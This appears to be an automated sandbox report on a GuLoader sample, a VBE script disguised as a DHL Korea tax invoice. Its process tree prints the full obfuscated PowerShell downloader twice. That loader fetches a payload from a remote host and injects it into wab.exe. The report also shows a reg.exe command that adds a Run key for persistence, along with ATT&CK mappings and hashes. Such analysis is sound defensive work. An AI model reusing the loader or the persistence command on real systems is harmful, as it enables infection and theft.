Overview

overview

10

Static

static

1

DHL_Korea_...df.vbe

windows7-x64

10

DHL_Korea_...df.vbe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 19:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DHL_Korea_Tax_Invoice_6064457135pdf.vbe

  • Size

    9KB

  • MD5

    27b373a50962c2f8fe26274c147195cd

  • SHA1

    1bba2d71036d371f78d628ac9c6cc13221d9ee89

  • SHA256

    3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee

  • SHA512

    dde61a1a192e888bd47135be665678b2334efb8d860ec0ea2224e1d17b95da3cbdad3fb79eff428ae99e0514d8e301d2b424c54127f8f621889e95a4ed888111

  • SSDEEP

    192:pzu36F4teCvSV/mcS36C2W3E11hEAGst4QoKVYHva607dqh2eyTxN8mSVqn:436Se4z36A3cDt/Rdb8miqn

Score
10/10
guloaderdownloaderexecutionpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Korea_Tax_Invoice_6064457135pdf.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1140
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"
        3⤵
          PID:2800
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1272
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"
            4⤵
              PID:2668
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:1648
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4416
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3704
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"
                    6⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:1572

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Modify Registry

        2
        T1112

        Credential Access

        Discovery

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\remcos\logs.dat
          Filesize

          144B

          MD5

          bbe7ee1adfbfb1b02e07160450ae1391

          SHA1

          84096994025426b7c979640782bcb9a8ef5cfc06

          SHA256

          3586654fabdddeeb056127bf207c185bd6ca91694c064cc88ea9938dd1ab5700

          SHA512

          f483cb8371c7c20158fc2d67a6baaa2fa71bf3fbbe539a2588b27b9589bf221044ed286575cb8e83758ae284c0fbc5fd22da7bac13487a4d24feaa7938a6b2bb

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urutdtu1.4bc.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Candollea.Lng
          Filesize

          431KB

          MD5

          1108e06376421f62462c79cc5ffc66e6

          SHA1

          8a274698fc2796c729b3b849197607468361031d

          SHA256

          976127a2f0eae89e47e054f75ebe9e4218b264071a11411ce77b20d4124431fb

          SHA512

          9cdffb2ba2d7b7e62b528a8b9009cefdd65348b68f7fbfd78ad33372fde47ca7c73625c6fc47e458adf5ef5ae355b6756fa871257370bc258bdc51253168ba4a

          Download Submit
        • memory/1140-1-0x00000187CBA40000-0x00000187CBA62000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1140-11-0x00007FF96DD60000-0x00007FF96E821000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1140-12-0x00007FF96DD60000-0x00007FF96E821000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1140-52-0x00007FF96DD60000-0x00007FF96E821000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1140-43-0x00007FF96DD60000-0x00007FF96E821000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1140-0-0x00007FF96DD63000-0x00007FF96DD65000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1140-42-0x00007FF96DD63000-0x00007FF96DD65000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1272-17-0x00000000051E0000-0x0000000005808000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/1272-20-0x00000000058C0000-0x0000000005926000-memory.dmp
          Filesize

          408KB

          Download
        • memory/1272-22-0x0000000074690000-0x0000000074E40000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1272-32-0x0000000005BB0000-0x0000000005F04000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/1272-33-0x0000000005F90000-0x0000000005FAE000-memory.dmp
          Filesize

          120KB

          Download
        • memory/1272-34-0x0000000005FD0000-0x000000000601C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/1272-35-0x00000000075D0000-0x0000000007C4A000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/1272-36-0x0000000006510000-0x000000000652A000-memory.dmp
          Filesize

          104KB

          Download
        • memory/1272-37-0x0000000007260000-0x00000000072F6000-memory.dmp
          Filesize

          600KB

          Download
        • memory/1272-38-0x00000000071F0000-0x0000000007212000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1272-39-0x0000000008200000-0x00000000087A4000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/1272-21-0x0000000005930000-0x0000000005996000-memory.dmp
          Filesize

          408KB

          Download
        • memory/1272-41-0x00000000087B0000-0x000000000CE7B000-memory.dmp
          Filesize

          70.8MB

          Download
        • memory/1272-19-0x00000000050D0000-0x00000000050F2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1272-18-0x0000000074690000-0x0000000074E40000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1272-46-0x0000000074690000-0x0000000074E40000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1272-45-0x000000007469E000-0x000000007469F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1272-47-0x0000000074690000-0x0000000074E40000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1272-49-0x0000000074690000-0x0000000074E40000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1272-16-0x0000000002690000-0x00000000026C6000-memory.dmp
          Filesize

          216KB

          Download
        • memory/1272-15-0x000000007469E000-0x000000007469F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/4416-48-0x0000000001000000-0x00000000056CB000-memory.dmp
          Filesize

          70.8MB

          Download